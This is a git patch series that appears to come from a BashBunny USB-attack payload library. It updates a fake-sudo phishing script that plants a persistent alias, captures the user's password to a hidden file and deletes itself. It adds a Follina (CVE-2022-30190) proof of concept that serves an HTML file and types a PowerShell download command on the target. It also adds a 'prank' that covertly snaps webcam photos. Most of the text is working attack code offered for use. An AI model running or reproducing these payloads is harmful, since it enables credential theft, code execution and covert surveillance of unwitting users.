From 80573a03ab10cce0b22f7c9bd0d059910d068439 Mon Sep 17 00:00:00 2001 From: TW-D <75358550+TW-D@users.noreply.github.com> Date: Sun, 29 May 2022 17:21:12 -0400 Subject: [PATCH 1/4] fake-sudo - Improvements and corrections (#528) * Update README.md * Update sudo-phishing.sh * Update sudo-phishing.sh * Delete payloads/library/phishing/fake-sudo directory * Add files via upload --- payloads/library/phishing/fake-sudo/README.md | 8 +++--- .../library/phishing/fake-sudo/payload.txt | 2 +- .../phishing/fake-sudo/sudo-phishing.sh | 27 +++++++++++-------- 3 files changed, 20 insertions(+), 17 deletions(-) diff --git a/payloads/library/phishing/fake-sudo/README.md b/payloads/library/phishing/fake-sudo/README.md index dfe8c791..d528e8ff 100644 --- a/payloads/library/phishing/fake-sudo/README.md +++ b/payloads/library/phishing/fake-sudo/README.md @@ -2,7 +2,7 @@ - Title: Fake sudo - Author: TW-D -- Version: 1.0 +- Version: 1.1 - Target: Linux - Category: Phishing @@ -12,7 +12,7 @@ 2) Defines a new persistent "sudo" alias with the file "~/.bash_aliases". 3) When the user "sudoer" executes the command "sudo" in a terminal, the spoofing program : - __By default__ retrieves the username and password and writes them to "/tmp/.sudo_password". -- __But__ this behavior can be changed in line 21 of the "sudo-phishing.sh" file. +- __But__ this behavior can be changed in line 26 of the "sudo-phishing.sh" file. 4) The spoofing program deletes the "sudo" alias. Then it deletes itself. ## Configuration @@ -29,7 +29,6 @@ readonly BB_LABEL="BashBunny" From "sudo-phishing.sh" change the values of the following constants if necessary : ```bash -readonly INPUT_MESSAGE="[sudo] password for ${USER}: " readonly MAXIMUM_ATTEMPTS=3 readonly ERROR_MESSAGE="sudo: ${MAXIMUM_ATTEMPTS} incorrect password attempts" @@ -40,9 +39,8 @@ From "sudo-phishing.sh", change the payload if you wish : ## # ## -/usr/bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password +/bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password ## # ## ``` - diff --git a/payloads/library/phishing/fake-sudo/payload.txt b/payloads/library/phishing/fake-sudo/payload.txt index a9bb2d1d..8c7b8522 100644 --- a/payloads/library/phishing/fake-sudo/payload.txt +++ b/payloads/library/phishing/fake-sudo/payload.txt @@ -7,7 +7,7 @@ # command by defining an persistent alias. # # Author: TW-D -# Version: 1.0 +# Version: 1.1 # Category: Phishing # Target: Linux # Attackmodes: HID and STORAGE diff --git a/payloads/library/phishing/fake-sudo/sudo-phishing.sh b/payloads/library/phishing/fake-sudo/sudo-phishing.sh index bd489f74..5a23359a 100644 --- a/payloads/library/phishing/fake-sudo/sudo-phishing.sh +++ b/payloads/library/phishing/fake-sudo/sudo-phishing.sh @@ -6,36 +6,41 @@ # of the "sudo" command. # -readonly INPUT_MESSAGE="[sudo] password for ${USER}: " +if [ -z "${SUDO_PROMPT}" ]; then + readonly INPUT_MESSAGE="[sudo] password for ${USER}: " +else + readonly INPUT_MESSAGE="${SUDO_PROMPT}" +fi + readonly MAXIMUM_ATTEMPTS=3 readonly ERROR_MESSAGE="sudo: ${MAXIMUM_ATTEMPTS} incorrect password attempts" attempts() { - /usr/bin/echo -n "${INPUT_MESSAGE}" + /bin/echo -n "${INPUT_MESSAGE}" read -r -s sudo_password - /usr/bin/echo "" - if /usr/bin/echo "${sudo_password}" | /usr/bin/sudo -S /usr/bin/true 2> /dev/null; then + /bin/echo "" + if ( /bin/echo "${sudo_password}" | /usr/bin/sudo -S /bin/true > /dev/null 2>&1 ); then ## # ## - /usr/bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password + /bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password ## # ## - /usr/bin/rm ~/.sudo_phishing.sh + /bin/rm ~/.sudo_phishing.sh /usr/bin/head -n -1 ~/.bash_aliases > ~/.bash_aliases_bak - /usr/bin/mv ~/.bash_aliases_bak ~/.bash_aliases - /usr/bin/echo "${sudo_password}" | /usr/bin/sudo -S "${@}" + /bin/mv ~/.bash_aliases_bak ~/.bash_aliases + /bin/echo "${sudo_password}" | /usr/bin/sudo -S "${@}" $BASH exit 0 fi } -if (/usr/bin/sudo -n /usr/bin/true 2> /dev/null) || [ "${#}" -eq 0 ]; then +if ( (/usr/bin/sudo -n /bin/true > /dev/null 2>&1) || [ "${#}" -eq 0 ] ); then /usr/bin/sudo "${@}" else for ((iterator=1; iterator <= MAXIMUM_ATTEMPTS; iterator++)); do attempts "${@}" done - /usr/bin/echo "${ERROR_MESSAGE}" -fi + /bin/echo "${ERROR_MESSAGE}" +fi \ No newline at end of file From 980debd8c027b2183062d15291f56d27cfe50727 Mon Sep 17 00:00:00 2001 From: panicacid Date: Wed, 1 Jun 2022 18:05:20 +0100 Subject: [PATCH 2/4] Created FollinaBunny a PoC payload that leverages CVE-2022-30190 (#530) * New Payload Added new PrintNightmare Payload (Quick and dirty) * Fixed my potty mouth I'm a child sometimes * Renamed Payload * PrintNightmare: Use SWITCH_POSITION in payload path * Fixing a typo * Added Delays Added some delays due to the fact that it was inconsistently reliable, occasionally it'd half type out the command. The delays have resolved the consistency issue on my end. Feel free to tweak as required. * Amending Version Number I'm a fool * Updated Readme with proper credit * Housekeeping Moved some of the QUACK Powershell commands into the juicybit.txt file for speed and ease of use. * Update README.md * More improvement Added exit to the juicybits rather than using alt and /noprofile to the run as * Update README.md * Pineapple-Connect-Windows New Payload For Connecting Client To Pineapple AP / Any AP Pineapple-Connect-Windows new Bashbunny payload for connecting target machine quickly and efficiently to your Pineapple AP or an AP of your choosing (and control!) * Changed from RUN WIN to QUACK STRING Changed from RUN WIN to QUACK STRING as I was having issues with the formatting, presume it needs wrapping in quotes or something but it just kept breaking. QUACK STRING works fine so meh * Added command to cover traks at the end of the script added a line of powershell to clean out the run registry key to hide any evidence of the script running * Added FollinaBunny Added a new payload which leverages CVE-2022-30190 to execute code based on a malicious website hosted on the bunny itself. Co-authored-by: Marc Co-authored-by: Marc --- .../library/execution/FollinaBunny/README.md | 31 +++++++++++++++ .../execution/FollinaBunny/payload.html | 38 +++++++++++++++++++ .../execution/FollinaBunny/payload.txt | 38 +++++++++++++++++++ 3 files changed, 107 insertions(+) create mode 100644 payloads/library/execution/FollinaBunny/README.md create mode 100644 payloads/library/execution/FollinaBunny/payload.html create mode 100644 payloads/library/execution/FollinaBunny/payload.txt diff --git a/payloads/library/execution/FollinaBunny/README.md b/payloads/library/execution/FollinaBunny/README.md new file mode 100644 index 00000000..4207fcfc --- /dev/null +++ b/payloads/library/execution/FollinaBunny/README.md @@ -0,0 +1,31 @@ +# FollinaBunny +- Author: PanicAcid +- Version: 1.0 +- Target: Windows (Powershell 5.1+) +- Category: Execution +- Attackmode: HID & RNDIS_ETHERNET +- Extensions: Run +- Props: Cribbit and 0xBacco + + +## Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | + +## Description +Executes code leveraging CVE-2022-30190 aka Follina using a malicious html file hosted on the Bunny itself. Whilst this exploit can be called via a malicious word document, a simple wget via PowerShell will also execute the malicious code.. Tweak and well you get the picture. + +This WILL flag on Defender if you're up to date, however the PoC here isn't that you can just run this code, it's that you can self serve this malicious html file via the BashBunny and you can tweak it to your hearts content. + +Based on Cribbit's Moo payload https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/prank/Win_PoSH_AnsiSebsCow +Example payload taken from https://greynolds.me.uk/ - https://greynolds.me.uk/poc.html + + + +## Colours +| Status | Colour | Description | +| -------- | ----------------------------- | --------------------------- | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting Powershell script | +| FINISHED | Green blink followed by SOLID | Injection finished | \ No newline at end of file diff --git a/payloads/library/execution/FollinaBunny/payload.html b/payloads/library/execution/FollinaBunny/payload.html new file mode 100644 index 00000000..428abcec --- /dev/null +++ b/payloads/library/execution/FollinaBunny/payload.html @@ -0,0 +1,38 @@ + + + + + +Good thing we disabled macros + + + +

+Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor. + +Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit. + +Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique ante, dignissim convallis ligula. Aenean quis felis dolor. In quis lectus massa. Pellentesque quis pretium massa. Vivamus facilisis ultricies massa ac commodo. Nam nec congue magna. Nullam laoreet justo ut vehicula lobortis. + +Aliquam rutrum orci tortor, non porta odio feugiat eu. Vivamus nulla mauris, eleifend eu egestas scelerisque, vulputate id est. Proin rutrum nec metus convallis ornare. Ut ultricies ante et dictum imperdiet. Ut nisl magna, porttitor nec odio non, dapibus maximus nibh. Integer lorem felis, accumsan a dapibus hendrerit, maximus nec leo. Vestibulum porta, orci sed dignissim porta, sem justo porta odio, quis rutrum tortor arcu quis massa. Aenean eleifend nisi a quam faucibus, quis scelerisque lectus condimentum. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin non dui nec odio finibus molestie. Suspendisse id massa nunc. Sed ultricies et sapien vel fringilla. +

+

+Donec tincidunt ac justo et iaculis. Pellentesque lacinia, neque at consectetur porttitor, leo eros bibendum lorem, eu sollicitudin dolor urna pharetra augue. Pellentesque facilisis orci quis ante tempor, ac varius eros blandit. Nulla vulputate, purus eu consectetur ullamcorper, mauris nulla commodo dolor, in maximus purus mi eget purus. In mauris diam, imperdiet ac dignissim ut, mollis in purus. In congue volutpat tortor eu auctor. Nullam a eros lectus. Aenean porta semper quam ac lacinia. Curabitur interdum, nisl eu laoreet tempus, augue nisl volutpat odio, dictum aliquam massa orci sit amet magna. + +Duis pulvinar vitae neque non placerat. Nullam at dui diam. In hac habitasse platea dictumst. Sed quis mattis libero. Nullam sit amet condimentum est. Nulla eget blandit elit. Nunc facilisis erat nec ligula ultrices, malesuada mollis ex porta. Phasellus iaculis lorem eu augue tincidunt, in ultrices massa suscipit. Donec gravida sapien ac dui interdum cursus. In finibus eu dolor sit amet porta. Sed ultrices nisl dui, at lacinia lectus porttitor ut. + +Ut ac viverra risus. Suspendisse lacus nunc, porttitor facilisis mauris ut, ullamcorper gravida dolor. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vivamus sollicitudin, arcu id sagittis facilisis, turpis dolor eleifend massa, in maximus sapien dui et tortor. Quisque varius enim sed enim venenatis tempor. Praesent quis volutpat lorem. Pellentesque ac venenatis lacus, vitae commodo odio. Sed in metus at libero viverra mollis sed vitae nibh. Sed at semper lectus. +

+

+Proin a interdum justo. Duis sed dui vitae ex molestie egestas et tincidunt neque. Fusce lectus tellus, pharetra id ex at, consectetur hendrerit nibh. Nulla sit amet commodo risus. Nulla sed dapibus ante, sit amet fringilla dui. Nunc lectus mauris, porttitor quis eleifend nec, suscipit sit amet massa. Vivamus in lectus erat. Nulla facilisi. Vivamus sed massa quis arcu egestas vehicula. Nulla massa lorem, tincidunt sed feugiat quis, faucibus a risus. Sed viverra turpis sit amet metus iaculis finibus. + +Morbi convallis fringilla tortor, at consequat purus vulputate sit amet. Morbi a ultricies risus, id maximus purus. Fusce aliquet tortor id ante ornare, non auctor tortor luctus. Quisque laoreet, sem id porttitor eleifend, eros eros suscipit lectus, id facilisis lorem lorem nec nibh. Nullam venenatis ornare ornare. Donec varius ex ac faucibus condimentum. Aenean ultricies vitae mauris cursus ornare. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas aliquet felis vel nulla auctor, ac tempor mi mattis. Nam accumsan nisi vulputate, vestibulum nisl at, gravida erat. Nam diam metus, tempor id sapien eu, porta luctus felis. Aliquam luctus vitae tortor quis consectetur. In rutrum neque sit amet fermentum rutrum. Sed a velit at metus pretium tincidunt tristique eget nibh. In ultricies, est ut varius pulvinar, magna purus tristique arcu, et laoreet purus elit ac lectus. Ut venenatis tempus magna, non varius augue consectetur ut. + +Etiam elit risus, ullamcorper cursus nisl at, ultrices aliquet turpis. Maecenas vitae odio non dolor venenatis varius eu ac sem. Phasellus id tortor tellus. Ut vehicula, justo ac porta facilisis, mi sapien efficitur ipsum, sit fusce. +

+ + + + \ No newline at end of file diff --git a/payloads/library/execution/FollinaBunny/payload.txt b/payloads/library/execution/FollinaBunny/payload.txt new file mode 100644 index 00000000..3ed81a00 --- /dev/null +++ b/payloads/library/execution/FollinaBunny/payload.txt @@ -0,0 +1,38 @@ +#!/bin/bash +# Title: PoC Follina Execution via BashBunny +# Description: Serves up a malicious website that leverages the current CVE-2022-30190 aka Follina +# Author: PanicAcid +# Version: 1.0 +# Category: Execution +# Target: Windows (Powershell 5.1+) +# Attackmodes: RNDIS_ETHERNET HID +# Props: Based on Cribbit's Moo payload https://github.com/hak5/bashbunny-payloads/blob/master/payloads/library/prank/Win_PoSH_AnsiSebsCow +# Example payload taken from https://greynolds.me.uk/ - https://greynolds.me.uk/poc.html +# Notes: This WILL flag on Defender if you're up to date, however the PoC here isn't that you can just run this code, it's that you can self serve +# this malicious html file via the BashBunny and you can tweak it to your hearts content. + +LED SETUP +ATTACKMODE RNDIS_ETHERNET HID + +GET SWITCH_POSITION +GET HOST_IP + + +cd /root/udisk/payloads/$SWITCH_POSITION/ + +# starting server +LED SPECIAL + +# disallow outgoing dns requests so server starts immediately +iptables -A OUTPUT -p udp --dport 53 -j DROP +python -m SimpleHTTPServer 80 & + +# wait until port is listening +while ! nc -z localhost 80; do sleep 0.2; done + +# attack commences +LED ATTACK +QUACK DELAY 200 +RUN WIN powershell.exe "wget http://$HOST_IP/payload.html" +QUACK DELAY 500 +LED FINISH \ No newline at end of file From d56f4fd788a53acf7b1837da06443fbbdc5fe37b Mon Sep 17 00:00:00 2001 From: Jorge Moya <37148657+vsh00t@users.noreply.github.com> Date: Wed, 1 Jun 2022 12:23:13 -0500 Subject: [PATCH 3/4] Update es-la.json (#529) --- languages/es-la.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/languages/es-la.json b/languages/es-la.json index 6c19dca4..25449936 100644 --- a/languages/es-la.json +++ b/languages/es-la.json @@ -144,7 +144,7 @@ "/":"02,00,24", "(":"02,00,25", ")":"02,00,26", - ")":"02,00,27", + "=":"02,00,27", "?":"02,00,2d", "¡":"02,00,2e", "¨":"02,00,2f", From 56a74583a4597fba4ecedac690b542bdb5c1ba0d Mon Sep 17 00:00:00 2001 From: LulzAnarchyAnon Date: Wed, 1 Jun 2022 10:23:58 -0700 Subject: [PATCH 4/4] Create payload.txt (#526) --- .../prank/ScreenSaver_FuNNN_b-b/payload.txt | 129 ++++++++++++++++++ 1 file changed, 129 insertions(+) create mode 100644 payloads/library/prank/ScreenSaver_FuNNN_b-b/payload.txt diff --git a/payloads/library/prank/ScreenSaver_FuNNN_b-b/payload.txt b/payloads/library/prank/ScreenSaver_FuNNN_b-b/payload.txt new file mode 100644 index 00000000..83faa387 --- /dev/null +++ b/payloads/library/prank/ScreenSaver_FuNNN_b-b/payload.txt @@ -0,0 +1,129 @@ +# Title: Title: ScreenSaveR_FuNNN_b/b +# Author: LulzAnarchyANon +# Description: The webcam is opened,and 15 pictures are taken and saved to the camera roll folder. +# The wallpaper settings are then changed so the Photos/Camera Roll folder is used for the screensaver. +# The slide show delay is set to 1 minute, and the slide show speed set to FAST +# Target: Windows 10 +# Props: Darren Kitchen and I am Jakoby +# Version: 1.0 +# Category: Prank + +LED B G 100 +ATTACKMODE HID +QUACK GUI +QUACK DELAY 5 +QUACK STRING camera +QUACK DELAY 50 +QUACK ENTER +QUACK DELAY 1000 +QUACK CONTROL SPACE +QUACK DELAY 200 +QUACK CONTROL SPACE +QUACK DELAY 200 +QUACK CONTROL SPACE +QUACK DELAY 200 +QUACK CONTROL SPACE +QUACK DELAY 200 +QUACK CONTROL SPACE +QUACK DELAY 200 +QUACK CONTROL SPACE +QUACK DELAY 200 +QUACK CONTROL SPACE +QUACK DELAY 200 +QUACK CONTROL SPACE +QUACK DELAY 200 +QUACK CONTROL SPACE +QUACK DELAY 200 +QUACK CONTROL SPACE +QUACK DELAY 200 +QUACK CONTROL SPACE +QUACK DELAY 200 +QUACK CONTROL SPACE +QUACK DELAY 200 +QUACK CONTROL SPACE +QUACK DELAY 200 +QUACK CONTROL SPACE +QUACK DELAY 200 +QUACK CONTROL SPACE +QUACK DELAY 1000 +QUACK STRING camera +QUACK ALT F4 +QUACK DELAY 2000 +QUACK GUI r +QUACK DELAY 100 +QUACK STRING control desk.cpl, ,@screensaver +QUACK ENTER +QUACK DELAY 200 +QUACK STRING P +QUACK DELAY 200 +QUACK TAB +QUACK DELAY 100 +QUACK TAB +QUACK DELAY 20 +QUACK TAB +QUACK DELAY 50 +QUACK DOWNARROW +QUACK DELAY 50 +QUACK DOWNARROW +QUACK DELAY 50 +QUACK DOWNARROW +QUACK DELAY 50 +QUACK DOWNARROW +QUACK DELAY 50 +QUACK DOWNARROW +QUACK DELAY 50 +QUACK DOWNARROW +QUACK DELAY 50 +QUACK DOWNARROW +QUACK DELAY 50 +QUACK DOWNARROW +QUACK DELAY 50 +QUACK DOWNARROW +QUACK DELAY 50 +QUACK DOWNARROW +QUACK DELAY 50 +QUACK TAB +QUACK DELAY 50 +QUACK TAB +QUACK DELAY 50 +QUACK TAB +QUACK DELAY 50 +QUACK TAB +QUACK DELAY 50 +QUACK TAB +QUACK DELAY 50 +QUACK TAB +QUACK DELAY 50 +QUACK TAB +QUACK DELAY 50 +QUACK TAB +QUACK DELAY 100 +QUACK ENTER +QUACK DELAY 50 +QUACK SPACE +QUACK DELAY 50 +QUACK TAB +QUACK DELAY 50 +QUACK TAB +QUACK DELAY 50 +QUACK RIGHTARROW +QUACK DELAY 50 +QUACK DOWNARROW +QUACK DELAY 50 +QUACK DOWNARROW +QUACK DELAY 50 +QUACK ENTER +QUACK TAB +QUACK DEALY 50 +QUACK SHIFT F +QUACK DELAY 50 +QUACK TAB +QUACK DELAY 50 +QUACK TAB +QUACK DELAY 50 +QUACK TAB +QUACK DELAY 50 +QUACK SHIFT S +QUACK DELAY 50 +QUACK ENTER +LED G 0